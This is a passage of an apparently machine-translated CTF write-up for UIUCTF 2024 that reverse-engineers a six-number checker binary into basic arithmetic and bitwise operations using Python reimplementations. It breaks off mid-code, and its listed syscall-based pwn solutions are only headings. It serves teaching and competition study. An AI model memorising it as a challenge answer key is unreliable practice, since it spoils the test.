{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-uiuctf-2024-en","result":{"data":{"markdownRemark":{"id":"2262684f-cbb8-541f-8526-9d29c3f15cf9","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-uiuctf-2024\">original page</a>.</p>\n</blockquote>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#summarizerev\">Summarize(Rev)</a></p>\n<ul>\n<li><a href=\"#func1\">FUNC1</a></li>\n<li><a href=\"#func2\">FUNC2</a></li>\n<li><a href=\"#func3\">FUNC3</a></li>\n<li><a href=\"#func4\">FUNC4</a></li>\n<li><a href=\"#func5\">FUNC5</a></li>\n<li><a href=\"#creating-the-solver\">Creating the Solver</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#syscallspwn\">Syscalls(Pwn)</a></p>\n<ul>\n<li><a href=\"#solution-1-using-openat-preadv2-and-pwritev2-with-an-iovec\">Solution 1: Using openat, preadv2, and pwritev2 with an iovec</a></li>\n<li><a href=\"#solution-2-using-openat-mmap-and-pwritev2-with-an-iovec\">Solution 2: Using openat, mmap, and pwritev2 with an iovec</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"summarizerev\" style=\"position:relative;\"><a href=\"#summarizerev\" aria-label=\"summarizerev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summarize(Rev)</h2>\n<blockquote>\n<p>All you have to do is find six numbers. How hard can that be?</p>\n</blockquote>\n<p>When I analyzed the challenge binary with a decompiler, I found that it was a program that accepts the integers A through F as input values and verifies them with the <code class=\"language-text\">check</code> function.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 728px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/61bb20520b0baa216ffbf85647374dd9/cecac/image-20240707134745268.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 110.00000000000001%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAIAAABPIytRAAAACXBIWXMAAAsTAAALEwEAmpwYAAACNklEQVQ4y5VUyW7bMBDlZyRaKe4UJUq2pcSxEi2WHRcp0iWtgQBtgx4K5NL/P3ckt+6lTlTggRqR8zhP1Bui/dPP/bfnz0/PD19+fHj8/m7/9e7j4+39p83bh/7N+25339ze1f3uutuumv7qpl1WTbmqLht47lB103iYuJg6AfaD8Ozs/Nxx/sAFOEe4AO8vHAdVdRtxJXRMuPBHPsA7wD8gOIEQVU0Xl1Vedcm8CEJ8OvUfQHXX66JKr1oqFIgcyk4n33Q9twtTLJVJQ4w9zx8wkdyuN1SnOst1mkWEwqcGEQH9QYBdzwfA2bied4jdYV//GKNmvYl0ouKESy21gfqxzWKTJKmFvSLCKOMAQhnjAmZg3xATCHBE0Oq6BgGwQAillEESLMB4IMDIhYRVCIRUMBPiCGgQDGSo7Eoj0zyio+Zw+FtHYa/IbvutmyxkWcV5YWfzrCiSLIft3QnHNlbWltiFSKyxmckyZRKoP5HcA5nlpUwyIENZFZuJbkHdZuuYGV9c6WyW5jNQblL7H7JxkmNbiHwxLy/mF5dQfKLPUNP1VJk4n5ss51Lh0SFTHbbut+HQVUYI6QfDlA8Ye+t3/dMqUNf3nkp5sTLlUsaGCimljrUBkzEuCRNMyFNaUN2uQ8KY0kwISI3AamAppcnoLf/FTxgaw8cU7A3iqUlFWTKb8dliGK3FSodCnlKO+u1txCVcJl4YQZILZhyuGNcd75qXOxRd1+2QBC+HpOMdNOCV0/4FKea52gXEmuEAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/61bb20520b0baa216ffbf85647374dd9/8ac56/image-20240707134745268.webp 240w,\n/static/61bb20520b0baa216ffbf85647374dd9/d3be9/image-20240707134745268.webp 480w,\n/static/61bb20520b0baa216ffbf85647374dd9/8cb3e/image-20240707134745268.webp 728w\"\n              sizes=\"(max-width: 728px) 100vw, 728px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/61bb20520b0baa216ffbf85647374dd9/8ff5a/image-20240707134745268.png 240w,\n/static/61bb20520b0baa216ffbf85647374dd9/e85cb/image-20240707134745268.png 480w,\n/static/61bb20520b0baa216ffbf85647374dd9/cecac/image-20240707134745268.png 728w\"\n            sizes=\"(max-width: 728px) 100vw, 728px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/61bb20520b0baa216ffbf85647374dd9/cecac/image-20240707134745268.png\"\n            alt=\"image-20240707134745268\"\n            title=\"image-20240707134745268\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The <code class=\"language-text\">check</code> function is implemented as follows. It passes the input integers to <code class=\"language-text\">FUNC1</code> through <code class=\"language-text\">FUNC5</code>, performs a series of calculations, and evaluates the results.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 710px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/8ef810ef625aa2b93cadbbdf06fba277/7131f/image-20240707140123074.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 121.25000000000001%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAYCAIAAAB1KUohAAAACXBIWXMAAAsTAAALEwEAmpwYAAACS0lEQVQ4y51T2Y7TQBDMZ7DxNbfvM07GR5yEaFm0Wm0QCytAgBBv/P8XULaTEIW8JFJrNJ5xdVdX9Uw+f//z8dtvxO7Lr93rz93rj8eXr++eP90/vWwfP7x9/7x5eOq2D+3mvl5tq+VGN12p23I5b9fbSVk1hsNMKgwqLMIsyi2KldmU28OKw+nU2IeBMA9hTBZ1K6JMBrHtEMt2/g/Tsi+eI/rKKitlEFk2wX9XRV9ZxjlT3rXIHlw1nYwywphhWteD206lJaHszd30brrXA3usSHfcXwbrumXKV16QpFkUp1y6yg/SLA/CiHGpPD/LCz8IIecIGCU89FzVlAvlh0EYS+U6lCvXC6OYceEQJqQbxYmQCr+CyMDFGDcD7bqlTHAhUUbrKs8LlJOur6s6L2Yo7hAKMGUcubAiNfKOREC7wRjwQseljpNMuT4AyIWCrheQnrqLFoSUQILisFfQaA8mQjK9juY1ZIFmPSvDHMUbNRsH6yLthkqXLbp4rgmhRzHOxuv0/MSquiVcAByW2nGIcd2EVTXhks4av5hfDUbPDuO0bP1sZlrWsdX+2rSPrV6cv0EwJvyySmYLzAbmASbDD+gJncMwhvI4xAnsmRrWQbY+aQ9GtTTLFrpartbdarPsVkGUBHFaFGU510mSFXMdZjOkgLoYOLgVJymcm+iqgYCuH8BRfA9mSpSFw0L0fo72EtpfgQsfpgAbXPWCDVOhTpz81+dZnP0DcF8ZWW95z3XbgQ3EuOU9N8tOKA8P6xYw1DZM+/hcr4q/fxvH9hH9dUwAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/8ef810ef625aa2b93cadbbdf06fba277/8ac56/image-20240707140123074.webp 240w,\n/static/8ef810ef625aa2b93cadbbdf06fba277/d3be9/image-20240707140123074.webp 480w,\n/static/8ef810ef625aa2b93cadbbdf06fba277/457aa/image-20240707140123074.webp 710w\"\n              sizes=\"(max-width: 710px) 100vw, 710px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/8ef810ef625aa2b93cadbbdf06fba277/8ff5a/image-20240707140123074.png 240w,\n/static/8ef810ef625aa2b93cadbbdf06fba277/e85cb/image-20240707140123074.png 480w,\n/static/8ef810ef625aa2b93cadbbdf06fba277/7131f/image-20240707140123074.png 710w\"\n            sizes=\"(max-width: 710px) 100vw, 710px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/8ef810ef625aa2b93cadbbdf06fba277/7131f/image-20240707140123074.png\"\n            alt=\"image-20240707140123074\"\n            title=\"image-20240707140123074\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>From here, let’s look at what each function does in order.</p>\n<h3 id=\"func1\" style=\"position:relative;\"><a href=\"#func1\" aria-label=\"func1 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>FUNC1</h3>\n<p><code class=\"language-text\">FUNC1</code> is a function that calls <code class=\"language-text\">FUNC2</code> after flipping the sign of the second argument out of the two input arguments it receives.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">void</span> <span class=\"token function\">FUNC1</span><span class=\"token punctuation\">(</span>undefined4 param_1<span class=\"token punctuation\">,</span><span class=\"token keyword\">int</span> param_2<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n<span class=\"token function\">FUNC2</span><span class=\"token punctuation\">(</span>param_1<span class=\"token punctuation\">,</span><span class=\"token operator\">-</span>param_2<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token keyword\">return</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<h3 id=\"func2\" style=\"position:relative;\"><a href=\"#func2\" aria-label=\"func2 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>FUNC2</h3>\n<p><code class=\"language-text\">FUNC2</code> performs the following calculation.</p>\n<p>It right-shifts each of the two arguments it receives and continues the calculation inside the loop until either value becomes 0.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">long</span> <span class=\"token function\">FUNC2</span><span class=\"token punctuation\">(</span>uint x<span class=\"token punctuation\">,</span>uint y<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  uint m<span class=\"token punctuation\">;</span>\n  uint n<span class=\"token punctuation\">;</span>\n  uint Y<span class=\"token punctuation\">;</span>\n  uint X<span class=\"token punctuation\">;</span>\n  uint L<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> K<span class=\"token punctuation\">;</span>\n  byte b<span class=\"token punctuation\">;</span>\n  \n  K <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  L <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  b <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  X <span class=\"token operator\">=</span> x<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span>Y <span class=\"token operator\">=</span> y<span class=\"token punctuation\">;</span> <span class=\"token punctuation\">(</span>X <span class=\"token operator\">!=</span> <span class=\"token number\">0</span> <span class=\"token operator\">||</span> <span class=\"token punctuation\">(</span>Y <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span> Y <span class=\"token operator\">=</span> Y <span class=\"token operator\">>></span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    m <span class=\"token operator\">=</span> X <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span><span class=\"token punctuation\">;</span>\n    n <span class=\"token operator\">=</span> Y <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span><span class=\"token punctuation\">;</span>\n    X <span class=\"token operator\">=</span> X <span class=\"token operator\">>></span> <span class=\"token number\">1</span><span class=\"token punctuation\">;</span>\n    K <span class=\"token operator\">=</span> K <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span>ulong<span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>m <span class=\"token operator\">^</span> n <span class=\"token operator\">^</span> L<span class=\"token punctuation\">)</span> <span class=\"token operator\">&lt;&lt;</span> <span class=\"token punctuation\">(</span>b <span class=\"token operator\">&amp;</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    L <span class=\"token operator\">=</span> n <span class=\"token operator\">&amp;</span> L <span class=\"token operator\">|</span> m <span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span>n <span class=\"token operator\">|</span> L<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    b <span class=\"token operator\">=</span> b <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> K <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>ulong<span class=\"token punctuation\">)</span>L <span class=\"token operator\">&lt;&lt;</span> <span class=\"token punctuation\">(</span>b <span class=\"token operator\">&amp;</span> <span class=\"token number\">0x3f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>I wanted to rewrite this computation as a Python script so that I could solve it with Z3, but I couldn’t build a good Z3Py solver because I would need to implement a loop whose termination condition depends on symbolic variables.</p>\n<p>So I considered reducing the calculation inside this function to a simple expression that does not use a loop.</p>\n<p>I did not have enough reverse-engineering skill to identify this function’s structure through static analysis, but this function is simply performing addition on two variables.</p>\n<p>In fact, when I tested the following Python reimplementation of the code, even after running the calculation 1,000 times with random values, every result was equal to <code class=\"language-text\">A + B</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">def</span> <span class=\"token function\">FUNC2</span><span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">,</span> y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    K <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    L <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    b <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    X <span class=\"token operator\">=</span> x\n    Y <span class=\"token operator\">=</span> y\n    <span class=\"token keyword\">while</span> X <span class=\"token operator\">!=</span> <span class=\"token number\">0</span> <span class=\"token keyword\">or</span> Y <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n        m <span class=\"token operator\">=</span> X <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span>\n        n <span class=\"token operator\">=</span> Y <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span>\n        X <span class=\"token operator\">=</span> X <span class=\"token operator\">>></span> <span class=\"token number\">1</span>\n        Y <span class=\"token operator\">=</span> Y <span class=\"token operator\">>></span> <span class=\"token number\">1</span>\n        K <span class=\"token operator\">=</span> K <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>m <span class=\"token operator\">^</span> n <span class=\"token operator\">^</span> L<span class=\"token punctuation\">)</span> <span class=\"token operator\">&lt;&lt;</span> <span class=\"token punctuation\">(</span>b <span class=\"token operator\">&amp;</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n        L <span class=\"token operator\">=</span> n <span class=\"token operator\">&amp;</span> L <span class=\"token operator\">|</span> m <span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span>n <span class=\"token operator\">|</span> L<span class=\"token punctuation\">)</span>\n        b <span class=\"token operator\">=</span> b <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n    <span class=\"token keyword\">return</span> K <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span>L <span class=\"token operator\">&lt;&lt;</span> <span class=\"token punctuation\">(</span>b <span class=\"token operator\">&amp;</span> <span class=\"token number\">0x3f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">from</span> random <span class=\"token keyword\">import</span> randint\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">1000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    A <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    B <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">assert</span> FUNC2<span class=\"token punctuation\">(</span>A<span class=\"token punctuation\">,</span>B<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> A <span class=\"token operator\">+</span> B\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Finish.\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Since <code class=\"language-text\">FUNC2</code> is an addition operation, it follows that <code class=\"language-text\">FUNC1</code> is a subtraction operation.</p>\n<h3 id=\"func3\" style=\"position:relative;\"><a href=\"#func3\" aria-label=\"func3 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>FUNC3</h3>\n<p>The following test code is a Python translation of <code class=\"language-text\">FUNC3</code>.</p>\n<p>This code also turns out to do nothing more than multiplication.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">def</span> <span class=\"token function\">FUNC3</span><span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">,</span> y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    K <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    b <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    X <span class=\"token operator\">=</span> x\n    <span class=\"token keyword\">while</span> X <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n        K <span class=\"token operator\">=</span> K <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span>y <span class=\"token operator\">&lt;&lt;</span> <span class=\"token punctuation\">(</span>b <span class=\"token operator\">&amp;</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">*</span> <span class=\"token punctuation\">(</span>X <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\n        X <span class=\"token operator\">=</span> X <span class=\"token operator\">>></span> <span class=\"token number\">1</span>\n        b <span class=\"token operator\">=</span> b <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n    <span class=\"token keyword\">return</span> K\n\n<span class=\"token keyword\">from</span> random <span class=\"token keyword\">import</span> randint\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">1000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    A <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    B <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">assert</span> FUNC3<span class=\"token punctuation\">(</span>A<span class=\"token punctuation\">,</span>B<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> A <span class=\"token operator\">*</span> B\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Finish.\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h3 id=\"func4\" style=\"position:relative;\"><a href=\"#func4\" aria-label=\"func4 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>FUNC4</h3>\n<p>This one is relatively easy to understand even from the original code, and we can see that it is a function that performs XOR.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">def</span> <span class=\"token function\">FUNC4</span><span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">,</span> y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    K <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    b <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    X <span class=\"token operator\">=</span> x\n    Y <span class=\"token operator\">=</span> y\n    <span class=\"token keyword\">while</span> X <span class=\"token operator\">!=</span> <span class=\"token number\">0</span> <span class=\"token keyword\">or</span> Y <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n        n <span class=\"token operator\">=</span> X <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span>\n        X <span class=\"token operator\">=</span> X <span class=\"token operator\">>></span> <span class=\"token number\">1</span>\n        K <span class=\"token operator\">=</span> K <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>n <span class=\"token operator\">^</span> <span class=\"token punctuation\">(</span>Y <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&lt;&lt;</span> <span class=\"token punctuation\">(</span>b <span class=\"token operator\">&amp;</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n        Y <span class=\"token operator\">=</span> Y <span class=\"token operator\">>></span> <span class=\"token number\">1</span>\n        b <span class=\"token operator\">=</span> b <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n    <span class=\"token keyword\">return</span> K\n\n<span class=\"token comment\"># FUNC4</span>\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">1000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    A <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    B <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">assert</span> FUNC4<span class=\"token punctuation\">(</span>A<span class=\"token punctuation\">,</span>B<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> A <span class=\"token operator\">^</span> B\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Finish.\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h3 id=\"func5\" style=\"position:relative;\"><a href=\"#func5\" aria-label=\"func5 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>FUNC5</h3>\n<p>This function has almost the same structure as <code class=\"language-text\">FUNC4</code>, and we can see that it performs an AND operation.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">def</span> <span class=\"token function\">FUNC5</span><span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">,</span> y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    N <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    b <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    X <span class=\"token operator\">=</span> x\n    Y <span class=\"token operator\">=</span> y\n    <span class=\"token keyword\">while</span> X <span class=\"token operator\">!=</span> <span class=\"token number\">0</span> <span class=\"token keyword\">or</span> Y <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n        n <span class=\"token operator\">=</span> X <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span>\n        X <span class=\"token operator\">=</span> X <span class=\"token operator\">>></span> <span class=\"token number\">1</span>\n        N <span class=\"token operator\">=</span> N <span class=\"token 